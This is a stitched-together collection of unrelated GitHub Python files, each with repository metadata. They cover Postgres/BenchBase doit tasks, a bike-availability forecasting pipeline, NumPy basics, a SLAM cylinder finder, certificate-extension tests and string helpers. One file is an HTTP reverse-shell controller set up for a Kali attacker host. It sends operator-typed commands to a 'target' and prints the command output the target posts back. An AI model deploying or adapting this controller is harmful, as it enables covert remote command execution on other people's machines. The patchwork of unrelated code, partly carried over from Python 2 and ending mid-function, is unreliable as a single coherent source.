sql_list = [
"ALTER SYSTEM SET log_destination='csvlog'",
"ALTER SYSTEM SET logging_collector='on'",
"ALTER SYSTEM SET log_statement='all'",
"ALTER SYSTEM SET log_connections='on'",
"ALTER SYSTEM SET log_disconnections='on'",
"ALTER SYSTEM SET log_directory='%(log_directory)s'",
]
return {
"actions": [
f"mkdir -p {POSTGRES_DATA_PATH}/%(log_directory)s",
*[
f'PGPASSWORD={DB_PASSWORD} {PSQL} --host=localhost --dbname={DEFAULT_DB} --username={DB_USERNAME} --command="{sql}"'
for sql in sql_list
],
],
"params": [
{
"name": "log_directory",
"long": "log_directory",
"default": "log",
},
{
"name": "log_file",
"long": "log_file",
"default": "postgresql-%Y-%m-%d_%H%M%S.log",
},
],
"verbosity": VERBOSITY_DEFAULT,
}
def task_perform_vacuum():
"""
Postgres: Performs vacuuming on the database system.
"""
return {
"actions": [
*[
f'PGPASSWORD={DB_PASSWORD} {PSQL} --host=localhost --dbname={DEFAULT_DB} --username={DB_USERNAME} --command="VACUUM;"'
],
],
"params": [],
"verbosity": VERBOSITY_DEFAULT,
}
def task_update_config():
def update_xml(benchmark, scalefactor=1, time=60, rate=10, terminals=1):
kwargs = locals().copy()
del kwargs["benchmark"]
config = get_config_path(benchmark)
logger.info(f"Updating arguments in config file {config} with values: {kwargs}")
actions = []
for param in kwargs:
# We're assuming that all keys in kwargs are in BENCHBASE_CONFIG_TAGS
key = BENCHBASE_CONFIG_TAGS[param]
value = locals()[param]
cmd = f"xmlstarlet edit --inplace --update '{key}' --value \"{value}\" {config}"
actions.append(cmd)
return "; \n".join(actions)
return {
"actions": [
CmdAction(update_xml),
],
"params": [
{
"name": "benchmark",
"long": "benchmark",
"help": "The benchmark to run.",
"default": "epinions",
},
{
"name": "scalefactor",
"long": "scalefactor",
"default": 1,
},
{
"name": "time",
"long": "time",
"default": 60, # 60s
},
{
"name": "rate",
"long": "rate",
"default": 10,
},
{
"name": "terminals",
"long": "terminals",
"default": 1,
},
],
"verbosity": VERBOSITY_DEFAULT,
}
def task_benchbase_workload_create():
"""
Benchbase: initializes the specified benchmark.
"""
def invoke_benchbase(benchmark, config, directory):
config = get_config_path(benchmark, config)
return f"echo {config}; java -jar benchbase.jar -b {benchmark} -c {config} -d {directory} --create=true --load=true"
return {
"actions": [
lambda: os.chdir(str(ARTIFACTS_PATH)),
# Invoke BenchBase.
CmdAction(invoke_benchbase),
# Reset working directory.
lambda: os.chdir(doit.get_initial_workdir()),
],
"file_dep": [ARTIFACT_benchbase],
"uptodate": [False],
"verbosity": VERBOSITY_DEFAULT,
"params": [
{
"name": "benchmark",
"long": "benchmark",
"help": "The benchmark to run.",
"default": "epinions",
},
{
"name": "config",
"long": "config",
"help": (
"The config file to use for BenchBase."
"Defaults to the config in the artifacts folder for the selected benchmark."
),
"default": None,
},
{
"name": "directory",
"long": "directory",
"default": f"{ARTIFACT_benchbase_results}",
},
],
}
def task_benchbase_run():
"""
BenchBase: run a specific benchmark.
"""
def invoke_benchbase(benchmark, config, directory, args):
config = get_config_path(benchmark, config)
return f"echo {config}; java -jar benchbase.jar -b {benchmark} -c {config} -d {directory} {args}"
return {
"actions": [
lambda: os.chdir(str(ARTIFACTS_PATH)),
# Invoke BenchBase.
CmdAction(invoke_benchbase),
# Reset working directory.
lambda: os.chdir(doit.get_initial_workdir()),
],
"file_dep": [ARTIFACT_benchbase],
"uptodate": [False],
"verbosity": VERBOSITY_DEFAULT,
"params": [
{
"name": "benchmark",
"long": "benchmark",
"help": "The benchmark to run.",
"default": "epinions",
},
{
"name": "config",
"long": "config",
"help": (
"The config file to use for BenchBase."
"Defaults to the config in the artifacts folder for the selected benchmark."
),
"default": None,
},
{
"name": "directory",
"long": "directory",
"default": f"{ARTIFACT_benchbase_results}",
},
{
"name": "args",
"long": "args",
"help": "Arguments to pass to BenchBase invocation.",
"default": "--create=false --load=false --execute=false",
},
],
}
|
karthik-ramanathan-3006/15-799-Special-Topics-in-Database-Systems
|
dodos/dodo.py
|
dodo.py
|
py
| 7,577 |
python
|
en
|
code
| 0 |
github-code
|
6
|
8927274924
|
from datetime import datetime as dt
from datetime import timedelta
import pickle
import time
import dask.dataframe as dd
from dask.distributed import as_completed, worker_client
import numpy as np
import pandas as pd
import requests
import s3fs
BUCKET = "insulator-citi-bikecaster"
INSULATOR_URLS = [
"https://api-dev.insulator.ai/v1/time_series",
"https://ybcbwoz3w6.execute-api.us-east-1.amazonaws.com/staging/v1/time_series"
]
s3 = s3fs.S3FileSystem()
def model_key(station_id):
return f"models/station_{station_id}.pkl"
def load_model(station_id):
with s3.open(f"{BUCKET}/{model_key(station_id)}", "rb") as f:
return pickle.loads(f.read())
def load_local_model(station_id):
with open(f"models/station_{station_id}.pkl", "rb") as f:
return pickle.load(f)
def ts_to_unixtime(series):
return series.astype(np.int64) // 10 ** 9
def post_outcome(df, station_id, usernames, api_keys):
two_hours_ago = dt.now() - timedelta(hours=2)
past_two_hours = df[df["last_reported"] >= two_hours_ago]
past_two_hours = past_two_hours.sort_values("last_reported")
series_timestamps = ts_to_unixtime(past_two_hours["last_reported"]).tolist()
series_values = past_two_hours["num_bikes_available"].astype("int").tolist()
post_event(station_id, series_timestamps, series_values, "outcome", usernames, api_keys)
def post_event(station_id, series_timestamps, series_values, event_type, usernames, api_keys):
payload = {
"service_name": "bikecaster",
"model_name": "lin_reg",
"model_version": "0.1.0",
"timestamp": time.time(),
"entities": {"station_id": station_id},
"series_timestamps": series_timestamps,
"series_values": series_values
}
assert event_type in ("prediction", "outcome")
for username, api_key, insulator_url in zip(usernames, api_keys, INSULATOR_URLS):
url = f"{insulator_url}/{event_type}"
try:
response = requests.post(url, auth=(username, api_key), json=payload)
if not response:
print(f"Error posting to insulator ingest API: {response.text}")
except Exception as e:
print(e)
def make_forecast(df, station_id, usernames, api_keys):
station_df = df[df["station_id"] == station_id]
post_outcome(station_df, station_id, usernames, api_keys)
station_df = (
station_df
.set_index("last_reported")
.sort_index()
.resample("5T", label="right", closed="right")
.last()
.fillna(method="ffill")
)
y = station_df["num_bikes_available"].values.copy()
X = y.reshape(-1, 1).copy()
try:
model = load_local_model(station_id)
except:
print(f"There's no model for station {station_id}")
return False
try:
series_values = np.squeeze(model.predict(X, start_idx=len(X) - 1))
except:
print(f"Error predicting for station {station_id}")
return False
series_values = np.clip(series_values.astype(int), 0, None).astype("int").tolist()
series_timestamps = pd.date_range(
station_df.index[-1], periods=len(series_values) + 1, freq="5T"
)
# Remove the first value because it's the last value in the original data.
series_timestamps = series_timestamps[1:]
series_timestamps = ts_to_unixtime(series_timestamps).astype("int").tolist()
post_event(station_id, series_timestamps, series_values, "prediction", usernames, api_keys)
return True
def pipeline(s3_path, usernames, api_keys):
df = dd.read_csv(s3_path).compute()
df["last_reported"] = pd.to_datetime(df["last_reported"])
MIN_DATE = "2016-01-01"
df = df[df.last_reported >= MIN_DATE]
with worker_client() as client:
df_future = client.scatter(df)
futures = []
for station_id in sorted(df["station_id"].unique().tolist()):
futures.append(client.submit(make_forecast, df_future, station_id, usernames, api_keys))
total = len(futures)
success = 0
for result in as_completed(futures):
if result.result():
success += 1
if success % 50 == 0:
print(f"{success} / {total} tasks successfully completed")
print(f"Done. Final tally: {success} / {total} tasks successfully completed")
return True
|
EthanRosenthal/citi-bikecaster-model
|
calcs.py
|
calcs.py
|
py
| 4,374 |
python
|
en
|
code
| 0 |
github-code
|
6
|
27646567910
|
import http.server
from colorama import Fore, Style
import os
import cgi
HOST_NAME = '127.0.0.1' # Kali IP address
PORT_NUMBER = 80 # Listening port number
class MyHandler(http.server.BaseHTTPRequestHandler): # MyHandler defines what we should do from the client / target
def do_GET(s):
# If we got a GET request, we will:-
s.send_response(200,message=None) # return HTML status 200 (OK)
        s.send_header("Content-type", "text/html") # Inform the target that the content type header is text/html
s.end_headers()
cmd = input(f"{Fore.LIGHTCYAN_EX}(Abuqasem)>{Style.RESET_ALL} ") # take user input
s.wfile.write(cmd.encode("utf-8")) # send the command which we got from the user input
def do_POST(s):
# If we got a POST, we will:-
s.send_response(200) # return HTML status 200 (OK)
s.end_headers()
length = int(s.headers['Content-Length']) # Define the length which means how many bytes
# value has to be integer
postVar = s.rfile.read(length) # Read then print the posted data
print(postVar.strip().decode("utf-8"), end="")
def getfile(s):
if s.path == '/store':
try:
                ctype, pdict = cgi.parse_header(s.headers.get('content-type'))  # headers.get works on Python 3 (getheader is Python 2 only)
if ctype == 'multipart/form-data':
fs = cgi.FieldStorage(fp=s.rfile,headers=s.headers,environ={'REQUEST_METHOD': 'POST'})
                else:
                    print("[-] Unexpected POST request")
                    return
fs_up = fs['file']
with open('/proof.txt', 'wb') as o:
o.write(fs_up.file.read())
s.send_response(200)
s.end_headers()
except Exception as e:
print (e)
return
if __name__ == '__main__':
    # We start a server_class and create the httpd object, passing our Kali IP, port number and handler class
server_class = http.server.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
try:
print(f"{Fore.LIGHTGREEN_EX}(Listening on port)->[{PORT_NUMBER}]{Style.RESET_ALL}")
        httpd.serve_forever() # start the HTTP server; if we get Ctrl+C we will interrupt it and close the server below
except KeyboardInterrupt:
print(f"{Fore.RED}[!] Server is terminated{Style.RESET_ALL}")
httpd.server_close()
|
zAbuQasem/Misc
|
http reverse shell/Server.py
|
Server.py
|
py
| 2,367 |
python
|
en
|
code
| 6 |
github-code
|
6
|
9238631713
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 6 17:18:39 2019
@author: akshaf
"""
import numpy as np
data1 = [[1,2,3,4],[5,6,7,8],["ab","c","d","d"]]
print("data1",data1)
type(data1)
a = np.array(data1)
a
type(a) # this gives numpy.ndarray
data1.__class__ # similar to the type(data1) function
a.__class__ # similar to the type(a) function
a.ndim # gives the number of dimensions (axes) of the array
a.shape # gives shape in the form of (row,column)
a.dtype # shows the data type of the elements stored in a
a1 = np.arange(15).reshape(3,5) # arange will create a sequence and reshape will shape it into a (row,column) structure
a1
type(a1)
a1.ndim
a1.shape
a1.dtype
z= np.zeros((3,6))
z
a = np.arange(50)
a
a.ndim
a[0]
a[6] # element at index 6 (the 7th element)
a[0:3] # first 3 elements
a[4:8] # 5th to 8th element
a[2:] # All elements that start from 2
a[:] # all elements from start to end
a[-3:] # last 3 elements
a1 = np.arange(15).reshape(3,5)
a1
a1[0]
a1[1]
a1[2]
a1[1:]
a1[1][2]
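# note: a1[1][2] and a1[1, 2] return the same value; the comma form is the idiomatic NumPy
# indexing style and avoids creating the intermediate row array a1[1] first.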
|
akshafmulla/PythonForDataScience
|
Basics_of_Python/Code/16 Numpy.py
|
16 Numpy.py
|
py
| 936 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32312362218
|
from osgeo import gdal
import numpy as np
# calculating SAVI and NDVI
noDataVal = -28672
def calculate_ndvi(nir, red):
valid_mask = (nir != noDataVal) & (red != noDataVal)
ndvi_band = np.where(valid_mask, (nir - red) / (nir + red), np.nan)
return ndvi_band
# Function to calculate SAVI
def calculate_savi(nir, red):
soil_factor = 0.5
valid_mask = (nir != noDataVal) & (red != noDataVal)
savi_band = np.where(valid_mask,((1 + soil_factor) * (nir - red)) / (nir + red + soil_factor),np.nan)
return savi_band
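# Reference note: this matches the standard soil-adjusted vegetation index,
# SAVI = (1 + L) * (NIR - Red) / (NIR + Red + L), with soil adjustment factor L = 0.5 (Huete, 1988).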
def export_geotiff(src_dataset, band, output_path):
# Get the geotransform from the NIR dataset
geotransform = src_dataset.GetGeoTransform()
# Create the output GeoTIFF
driver = gdal.GetDriverByName('GTiff')
output_dataset = driver.Create(output_path, src_dataset.RasterXSize, src_dataset.RasterYSize, 1, gdal.GDT_Float32)
# Set the geotransform and projection
output_dataset.SetGeoTransform(geotransform)
output_dataset.SetProjection(src_dataset.GetProjection())
# Write the SAVI band to the output GeoTIFF
output_band = output_dataset.GetRasterBand(1)
output_band.WriteArray(band)
# Flush data to disk and close the output GeoTIFF
output_band.FlushCache()
output_dataset.FlushCache()
output_dataset = None
def export_savi_ndvi(nir_path, red_path):
savi_output_path = nir_path.replace("nir", "savi")
ndvi_output_path = nir_path.replace("nir", "ndvi")
# Open NIR and red GeoTIFF files
nir_dataset = gdal.Open(nir_path)
red_dataset = gdal.Open(red_path)
# Read NIR and red bands as NumPy arrays
nir_band = nir_dataset.GetRasterBand(1).ReadAsArray()
red_band = red_dataset.GetRasterBand(1).ReadAsArray()
savi_band = calculate_savi(nir_band, red_band)
ndvi_band = calculate_ndvi(nir_band, red_band)
export_geotiff(nir_dataset, savi_band, savi_output_path)
export_geotiff(nir_dataset, ndvi_band, ndvi_output_path)
print('exported', savi_output_path)
print('exported', ndvi_output_path)
# Paths to NIR and red GeoTIFF files
# nir_path = r'C:\Users\dusti\Desktop\GCERlab\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\nir_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# red_path = r'C:\Users\dusti\Desktop\GCERlab\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\red_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# nir_path = r'C:\Users\dnv22\Desktop\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\nir_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# red_path= r'C:\Users\dnv22\Desktop\ET_goes16\download_goes\datasets\images\goes\goes16\geonexl2\geotiffs\h14v04\2018\001\1600\red_GO16_ABI12B_20180011600_GLBG_h14v04_02_proj.tif'
# export_savi_ndvi(nir_path, red_path)
|
dustnvan/ET_goes16
|
goes_export_geotiff/export_savi_ndvi.py
|
export_savi_ndvi.py
|
py
| 2,866 |
python
|
en
|
code
| 0 |
github-code
|
6
|
10389322209
|
import glob
import os
from os import path as op
import cv2
import numpy as np
from torch.utils.data import DataLoader
from pathlib import Path
from PIL import Image, ImageFilter
from detection.dummy_cnn.dataset import BaseBillOnBackGroundSet
from tqdm import tqdm
from sewar.full_ref import sam as sim_measure
from itertools import combinations, product
import time
from matplotlib import pyplot as plt
from multiprocessing import Pool
import pandas as pd
repo = Path(os.getcwd())
im_dir_gen = os.path.join(repo, "processed_data", "genbills")
im_dir_real = os.path.join(repo, "processed_data", "realbills")
im_dir_unseen = os.path.join(repo, "processed_data", "realbills", "unseen")
def resize(list_of_images, size):
outp = []
for im in tqdm(list_of_images):
copy = im.copy()
copy.thumbnail(size=(size, size), resample=Image.ANTIALIAS)
if copy.width > copy.height:
copy = copy.rotate(90, fillcolor=(0,), expand=True)
outp.append(copy)
return outp
def combs_self(list_of_images):
return np.array(list(combinations(range(len(list_of_images)), r=2))).astype(int)
def combs_between(list_of_images1, list_of_images2):
return np.array(list(product(range(len(list_of_images1)), range(len(list_of_images2))))).astype(int)
def simil(pair): # subfunction to put in parallel loop
im_1, im_2 = pair
m = ""
if im_1.width != im_2.width or im_1.height != im_2.height:
m = f"crop happened\n im1 dims = {im_1.width},{im_1.height},\n im2 dims = {im_2.width},{im_2.height}"
min_w = min(im_1.width, im_2.width)
min_h = min(im_1.height, im_2.height)
im_1 = im_1.crop((1, 1, min_w-1, min_h-1))
im_2 = im_2.crop((1, 1, min_w-1, min_h-1))
m+= f"\n crop dims = 1to{min_w-1}, 1to{min_h-1}"
m+= f"\n final dims = {im_1.width},{im_1.height}"
try:
score = sim_measure(np.array(im_1), np.array(im_2))
except Exception as e:
score = 0.5
print(e)
print(m)
return score
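# Note: sewar's sam() returns the spectral angle between the two images, so lower values mean more
# similar images; the averaged score is therefore a dissimilarity measure, which matches the
# "Dissimilarity" plot titles further down.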
def similarity(list_of_images1, list_of_images2, combs):
similarity_score = 0
list_of_images1 = [list_of_images1[idx] for idx in combs[:,0]]
list_of_images2 = [list_of_images2[idx] for idx in combs[:,1]]
with Pool(12) as pool:
for score in tqdm(pool.imap(simil, zip(list_of_images1, list_of_images2)), total=len(list_of_images1)):
similarity_score += score
pool.close()
similarity_score /= len(combs)
return similarity_score
def edgin(image): #task function to put in Pool loop
corners = cv2.goodFeaturesToTrack(np.array(image.convert("L")), int(1e+6), 1e-6, 1e-6)
return len(corners)
def edginess(list_of_images):
score = 0
with Pool(12) as pool:
for corners in tqdm(pool.imap(edgin, list_of_images), total=len(list_of_images)):
score += corners
score /= len(list_of_images)
return score
# This script is meant do discover which size for training corner_cnn is the best
generated_images = BaseBillOnBackGroundSet(image_dir=im_dir_gen)
loader = DataLoader(dataset=generated_images,
batch_size=1,
num_workers=12,
shuffle=True)
temp = []
for im, _ in tqdm(loader, total=200):
im = im[0].numpy()
where_0 = np.sum(im, axis=2) > 0
for row, element in enumerate(where_0):
if np.all(element == 0): break
for col, element in enumerate(where_0.T):
if np.all(element == 0): break
im = im[:row, :col, :]
try:
temp.append(Image.fromarray(im))
    except Exception:
        print("Error occurred")
if len(temp) == 200: break
generated_images = temp
real_images = glob.glob(op.join(im_dir_real, "*.jpg"), recursive=False)
real_images = [Image.open(file) for file in real_images if not "mask" in file]#[:8]
test_images = glob.glob(op.join(im_dir_unseen, "*.jpg"), recursive=False)
test_images = [Image.open(file) for file in test_images if not "mask" in file]#[:8]
sizes = np.geomspace(1000, 10, 100).astype(int)
scores = {'sim_gen': [],
'sim_real': [],
'sim_test': [],
'sim_gen_vs_real': [],
'sim_gen_vs_test': [],
'sim_test_vs_real': [],
"edg_gen": [],
"edg_real": [],
"edg_test": []}
print("#" * 100)
print()
for size in sizes:
images_of_size = {"gen": [], "real": [], "test": []}
print(f"Resizing {size}")
images_of_size['gen'] = resize(generated_images, size)
images_of_size['real'] = resize(real_images, size)
images_of_size['test'] = resize(test_images, size)
time.sleep(2)
print(f"\nCollect similarity inside every set {size}")
for k in images_of_size.keys():
sim = similarity(list_of_images1=images_of_size[k],
list_of_images2=images_of_size[k],
combs=combs_self(images_of_size[k]))
scores[f'sim_{k}'].append(sim)
time.sleep(2)
print(f"\nCollect similarity inbetween sets {size}")
for k_pair in [("gen", "real"), ("gen", "test"), ("test", "real")]:
sim = similarity(list_of_images1=images_of_size[k_pair[0]],
list_of_images2=images_of_size[k_pair[1]],
combs=combs_between(list_of_images1=images_of_size[k_pair[0]],
list_of_images2=images_of_size[k_pair[1]]))
scores[f'sim_{k_pair[0]}_vs_{k_pair[1]}'].append(sim)
time.sleep(2)
print(f"\nCollect edginess of every set {size}")
for k in images_of_size.keys():
edg = edginess(list_of_images=images_of_size[k])
scores[f'edg_{k}'].append(edg)
time.sleep(2)
# plotting current results
num_el = len(scores["sim_gen"])
f, ax = plt.subplots(nrows=3, ncols=1, figsize=(10, 15))
ax[0].set_title("Dissimilarity of images within each set")
ax[0].set_xlabel("Size of image")
ax[0].plot(sizes[:num_el][::-1], scores["sim_gen"][::-1], label="generated images", c="red")
ax[0].plot(sizes[:num_el][::-1], scores["sim_real"][::-1], label="real images", c="blue")
ax[0].plot(sizes[:num_el][::-1], scores["sim_test"][::-1], label="test images", c="blue", ls=":")
ax[1].set_title("Dissimilarity of images between sets")
ax[1].set_xlabel("Size of image")
ax[1].plot(sizes[:num_el][::-1], scores["sim_gen_vs_real"][::-1], label="generated vs real images", c="blue")
ax[1].plot(sizes[:num_el][::-1], scores["sim_gen_vs_test"][::-1], label="generated vs test images", c="blue", ls=":")
ax[1].plot(sizes[:num_el][::-1], scores["sim_test_vs_real"][::-1], label="real vs test images", c="green")
ax[2].set_title("Number of corners detected of images within each set")
ax[2].set_xlabel("Size of image")
ax[2].plot(sizes[:num_el][::-1], scores["edg_gen"][::-1], label="generated images", c="red")
ax[2].plot(sizes[:num_el][::-1], scores["edg_real"][::-1], label="real images", c="blue")
ax[2].plot(sizes[:num_el][::-1], scores["edg_test"][::-1], label="test images", c="blue", ls=":")
ax[2].set_yscale('log')
for a in ax:
a.legend()
a.grid(axis="x", which="both")
a.invert_xaxis()
a.set_xscale('log')
plt.tight_layout()
plt.savefig("/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/0_stats.png", dpi=150)
plt.close("all")
# save examples of images
images_of_size['gen'][0].save(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/generated_{size}.png")
images_of_size['real'][0].save(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/real_{size}.png")
images_of_size['test'][0].save(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/test_{size}.png")
#save scores
frame = pd.DataFrame(scores)
frame.set_index(sizes[:num_el], inplace=True)
frame.to_csv(f"/home/sasha/Documents/BachelorsProject/Repo/real_bills_results/comp_sizes/0_scores.csv", sep=";")
print("#" * 100)
|
KaraLandes/BachelorsProject
|
Repo/compare_data_similarity.py
|
compare_data_similarity.py
|
py
| 8,019 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23396456749
|
'''
The locals() function returns all local variables at the current position as a dictionary.
Syntax
locals() function syntax:
locals()
Parameters
none
Return value
Returns the local variables as a dictionary
1 Do not modify the contents of the dictionary returned by locals(); the changes may not affect how the interpreter uses the local variables.
2 Calling locals() inside a function body returns the free variables; modifying free variables does not affect how the interpreter uses them.
3 Free variables cannot be returned within a class block.
'''
def test_py(arg):
z=1
print(locals())
test_py(6) # output: {'z': 1, 'arg': 6}
def foo(arg, a):
x = 100
y = 'hello python!'
for i in range(10):
j = 1
k = i
print(locals())
foo(1, 2) # output: {'k': 9, 'j': 1, 'i': 9, 'y': 'hello python!', 'x': 100, 'a': 2, 'arg': 1}
# Reference blog: https://blog.csdn.net/sxingming/article/details/52061630
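# Illustrative addition (not from the original note), showing caveat 1 above in practice:
# rebinding a key in the dict returned by locals() does not change the real local variable.
def locals_write_demo():
    x = 10
    locals()['x'] = 99   # only the snapshot dictionary is modified
    return x
print(locals_write_demo())  # prints 10, not 99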
|
tyutltf/Python_funs
|
locals函数详解.py
|
locals函数详解.py
|
py
| 952 |
python
|
zh
|
code
| 20 |
github-code
|
6
|
71345155708
|
#!/usr/bin/env python
import unittest
import copy
from ct.cert_analysis import base_check_test
from ct.cert_analysis import extensions
from ct.crypto.asn1 import oid
from ct.crypto.asn1 import types
from ct.crypto import cert
def remove_extension(certificate, ex_oid):
# If given extension exists in certificate, this function will remove it
extensions = certificate.get_extensions()
for i, ext in enumerate(extensions):
if ext["extnID"] == ex_oid:
del extensions[i]
break
def set_extension_criticality(certificate, ex_oid, value):
extensions = certificate.get_extensions()
for ext in extensions:
if ext["extnID"] == ex_oid:
ext["critical"] = types.Boolean(value)
CORRECT_LEAF = cert.Certificate.from_pem_file("ct/crypto/testdata/youtube.pem")
CORRECT_CA = cert.Certificate.from_pem_file("ct/crypto/testdata/subrigo_net.pem")
CORRECT_SUBORDINATE = cert.Certificate.from_pem_file("ct/crypto/testdata/"
"verisign_intermediate.pem")
class ExtensionsTest(base_check_test.BaseCheckTest):
def test_good_leaf_cert(self):
check = extensions.CheckCorrectExtensions()
result = check.check(CORRECT_LEAF)
self.assertEqual(len(result), 0)
def test_good_ca_cert(self):
check = extensions.CheckCorrectExtensions()
result = check.check(CORRECT_CA)
self.assertEqual(len(result), 0)
def test_good_subordinate_cert(self):
check = extensions.CheckCorrectExtensions()
result = check.check(CORRECT_SUBORDINATE)
self.assertEqual(len(result), 0)
def test_ca_missing_extension(self):
certificate = copy.deepcopy(CORRECT_CA)
remove_extension(certificate, oid.ID_CE_BASIC_CONSTRAINTS)
check = extensions.CheckCorrectExtensions()
result = check.check(certificate)
self.assertObservationIn(
extensions.LackOfRequiredExtension(extensions._ROOT,
extensions._oid_to_string(
oid.ID_CE_BASIC_CONSTRAINTS)),
result)
self.assertEqual(len(result), 1)
if __name__ == '__main__':
unittest.main()
|
kubeup/archon
|
vendor/github.com/google/certificate-transparency/python/ct/cert_analysis/extensions_test.py
|
extensions_test.py
|
py
| 2,258 |
python
|
en
|
code
| 194 |
github-code
|
6
|
33229423614
|
# For each cylinder in the scan, find its ray and depth.
# 03_c_find_cylinders
# Claus Brenner, 09 NOV 2012
from pylab import *
from lego_robot import *
# Find the derivative in scan data, ignoring invalid measurements.
def compute_derivative(scan, min_dist):
jumps = [ 0 ]
    for i in range(1, len(scan) - 1):
l = scan[i-1]
r = scan[i+1]
if l > min_dist and r > min_dist:
derivative = (r - l) / 2.0
jumps.append(derivative)
else:
jumps.append(0)
jumps.append(0)
return jumps
# For each area between a left falling edge and a right rising edge,
# determine the average ray number and the average depth.
def find_cylinders(scan, scan_derivative, jump, min_dist):
cylinder_list = []
on_cylinder = False
sum_ray, sum_depth, rays = 0.0, 0.0, 0
    for i in range(len(scan_derivative)):
# --->>> Insert your cylinder code here.
# Whenever you find a cylinder, add a tuple
# (average_ray, average_depth) to the cylinder_list.
        # If we find a strong negative value for the derivative,
        # then we have found a landmark's left edge. See Scan0.png for visual reference.
if(scan_derivative[i] < -jump):
on_cylinder = True
rays = 0
sum_ray = 0.0
sum_depth = 0
        # Each time a landmark's right edge is detected, two consecutive derivative values above
        # the detection threshold appear. Only the first derivative value is valid and is
        # associated with the last suitable laser beam of the currently analyzed scan.
elif(scan_derivative[i] > jump and on_cylinder):
on_cylinder = False
            # Add the values associated with the laser
            # beam that detects the landmark's right edge.
rays += 1
sum_ray += i
sum_depth += scan[i]
cylinder_list.append((sum_ray/rays, sum_depth/rays))
if(on_cylinder and scan[i] > min_dist):
rays += 1
sum_ray += i
sum_depth += scan[i]
return cylinder_list
if __name__ == '__main__':
minimum_valid_distance = 20.0
depth_jump = 100.0
# Read the logfile which contains all scans.
logfile = LegoLogfile()
logfile.read("robot4_scan.txt")
# Pick one scan.
scan = logfile.scan_data[8]
# Find cylinders.
der = compute_derivative(scan, minimum_valid_distance)
cylinders = find_cylinders(scan, der, depth_jump, minimum_valid_distance)
# Plot results.
plot(scan)
scatter([c[0] for c in cylinders], [c[1] for c in cylinders],
c='r', s=200)
show()
|
jfrascon/SLAM_AND_PATH_PLANNING_ALGORITHMS
|
01-GETTING_STARTED/CODE/slam_03_c_find_cylinders_question.py
|
slam_03_c_find_cylinders_question.py
|
py
| 2,747 |
python
|
en
|
code
| 129 |
github-code
|
6
|
31282202503
|
# pylint: disable=missing-docstring
# pylint: disable=invalid-name
import functools
import re
# import unicodedata
from string import punctuation as PUNCTUATIONS
import numpy as np
from doors.dates import get_timestamp
SPECIAL_PUNCTUATIONS = PUNCTUATIONS.replace("_", "")
def not_is_feat(col):
return not is_feat(col)
def is_feat(col):
return "feat:" in col
def clean_string(string):
return string.lower().rstrip().replace(" ", "_").replace("'", "")
def to_lowercase(strings):
strings = [string.lower() for string in strings]
return strings
def get_pronounceable_name():
consonants = ["b", "d", "f", "g", "h", "j", "k", "l", "m", "n", "p", "r", "s", "t"]
vowels = ["a", "e", "i", "o", "u"]
final_consonants = ["b", "f", "k", "l", "m", "n", "r", "s", "t"]
return (
np.random.choice(consonants)
+ np.random.choice(vowels)
+ np.random.choice(consonants)
+ np.random.choice(vowels)
+ np.random.choice(final_consonants)
)
def get_unique_id():
"""Pronounceable hash to be pronounced more or less ecclesiastically.
More details: https://www.ewtn.com/expert/answers/ecclesiastical_latin.htm
"""
return get_pronounceable_name() + "_" + get_timestamp("%y%m%d_%H%M%S")
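# Example output (illustrative; depends on the RNG and the clock, and assumes doors.dates.get_timestamp
# formats the current time): something like "bamor_240131_154502" -- a five-letter pronounceable
# prefix plus a %y%m%d_%H%M%S timestamp.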
def add_as_strings(*args, **kwargs):
result = args[0].astype(str)
sep = kwargs.get("sep")
if sep:
seperator = np.repeat(sep, len(result))
else:
seperator = None
for arr in args[1:]:
if seperator is not None:
result = _add_strings(result, seperator)
result = _add_strings(result, arr.astype(str))
return result
def _add_strings(v, w):
return np.core.defchararray.add(v, w)
def camelcase_to_underscore(string):
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", string)
return re.sub("([a-z0-9])([A-Z])", r"\1_\2", s1).lower()
def remove_punctuation(string):
for punctuation in SPECIAL_PUNCTUATIONS:
string = string.replace(punctuation, "")
return string
# def utf_to_ascii(string):
# uni_string = unicode(string, "utf")
# ascii_string = unicodedata.normalize("NFKD", uni_string).encode("ascii", "ignore")
# return ascii_string
def is_ascii(string):
    try:
        string.encode("ascii")  # str.encode works on Python 3; the old decode call was a Python 2 leftover
        return True
    except UnicodeEncodeError:
        return False
def as_string(obj):
if hasattr(obj, "__name__"):
representation = obj.__name__
elif isinstance(obj, functools.partial):
representation = _get_partial_representation(obj)
elif hasattr(obj, "__dict__"):
representation = get_class_representation(obj)
elif hasattr(obj, "__name__"):
representation = obj.__name__
else:
representation = str(obj)
return representation
def _get_partial_representation(obj):
func_rep = as_string(obj.func)
input_rep = "func=" + func_rep
if _args_provided(obj):
arg_rep = _get_arg_representation(obj.args)
input_rep += ", " + arg_rep
if _kwargs_provided(obj):
kwarg_rep = get_dict_string_representation(obj.keywords)
input_rep += ", " + kwarg_rep
partial_rep = "partial({})".format(input_rep)
return partial_rep
def _kwargs_provided(obj):
return len(obj.keywords) > 0
def _args_provided(obj):
return len(obj.args) > 0
def _get_arg_representation(args):
return ", ".join([str(arg) for arg in args])
def get_class_representation(obj):
joint_str_rep = get_dict_string_representation(obj.__dict__)
cls_name = obj.__class__.__name__
return "{}({})".format(cls_name, joint_str_rep)
def get_dict_string_representation(dct):
str_rep = []
for key, value in dct.items():
if key[0] != "_":
value_representation = as_string(value)
str_rep.append("{}={}".format(key, value_representation))
joint_str_rep = ", ".join(str_rep)
return joint_str_rep
def convert_camelcase(camelcase):
"""
Credit to:
http://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-
camelcase-to-snake-case
"""
s1 = re.sub("(.)([A-Z][a-z]+)", r"\1_\2", camelcase)
